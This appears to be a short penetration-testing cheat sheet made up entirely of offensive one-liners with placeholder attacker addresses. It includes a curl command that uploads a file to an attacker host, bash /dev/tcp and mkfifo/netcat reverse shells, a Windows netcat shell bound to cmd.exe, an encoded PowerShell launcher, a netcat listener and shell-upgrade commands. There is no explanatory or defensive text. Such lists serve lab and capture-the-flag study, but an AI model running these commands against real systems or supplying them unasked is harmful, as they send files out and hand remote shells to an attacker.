curl.exe -F "files=@file" http://<LHOST>/upload

bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1
bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f

nc.exe <LHOST> <LPORT> -e cmd.exe
powershell -e BASE64_SHELL

rlwrap -cAr nc -lvnp <LPORT>

script /dev/null -qc /bin/bash
python3 -c 'import pty; pty.spawn("/bin/bash")'